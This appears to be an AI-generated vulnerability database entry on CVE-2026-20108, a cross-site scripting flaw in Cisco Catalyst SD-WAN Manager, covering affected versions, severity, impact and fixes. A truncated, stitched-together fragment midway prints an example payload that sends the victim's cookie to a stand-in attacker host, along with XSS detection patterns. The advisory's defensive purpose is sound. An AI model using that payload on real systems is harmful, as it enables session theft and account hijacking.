
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-20108 is a stored/reflected cross-site scripting (XSS) vulnerability in the web-based management interface of Cisco Catalyst SD-WAN Manager. It allows an authenticated, remote attacker to conduct XSS attacks against other users of the interface by exploiting insufficient input validation. The vulnerability affects Cisco Catalyst SD-WAN Manager across multiple releases in the 20.12, 20.13, 20.14, 20.15, 20.16, and 20.18 trains; releases 20.11 and earlier are not affected. It was first published on March 25, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (Cisco Advisory).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), where the SD-WAN Manager interface fails to adequately sanitize or encode attacker-controlled data before rendering it in the browser. Exploitation requires the attacker to be authenticated (low-privilege) and to socially engineer a target user into clicking a crafted link, making this a network-based, low-complexity attack with required user interaction. The vulnerability was discovered during Cisco's internal security testing, and no public proof-of-concept code has been disclosed (Cisco Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session within the SD-WAN Manager interface, potentially enabling session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. The scope is changed (S:C), meaning the injected script can affect resources beyond the attacker's own session. Confidentiality and integrity impacts are both rated Low, with no direct availability impact; however, access to sensitive browser-based information such as session cookies or management credentials could facilitate further compromise of the SD-WAN infrastructure (Cisco Advisory).
As of the advisory publication date, Cisco PSIRT is not aware of any public announcements or malicious use of this vulnerability in the wild. No exploit code has been publicly released, and the vulnerability was identified through internal security testing rather than external researcher disclosure. The EPSS score is approximately 0.036% (0.000360), indicating a low probability of exploitation in the near term (Cisco Advisory, Feedly). It is not currently listed in the CISA Known Exploited Vulnerabilities catalog.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).%3Cscript%3E, javascript:, onerror=, onload=); authentication events from unexpected IP addresses following a potential session hijack.Cisco has released fixed software versions to address this vulnerability; there are no workarounds available. Administrators should upgrade to the following fixed releases based on their current train: 20.12 → 20.12.5.3 or 20.12.6.1; 20.15 → 20.15.4.2 or 20.15.5; 20.18 → 20.18.2.1. Releases 20.13, 20.14, and 20.16 have reached End of Software Maintenance and customers must migrate to a supported fixed release. Cisco strongly recommends restricting management interface access to trusted networks and enforcing multi-factor authentication to reduce the risk of credential compromise that could enable exploitation (Cisco Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."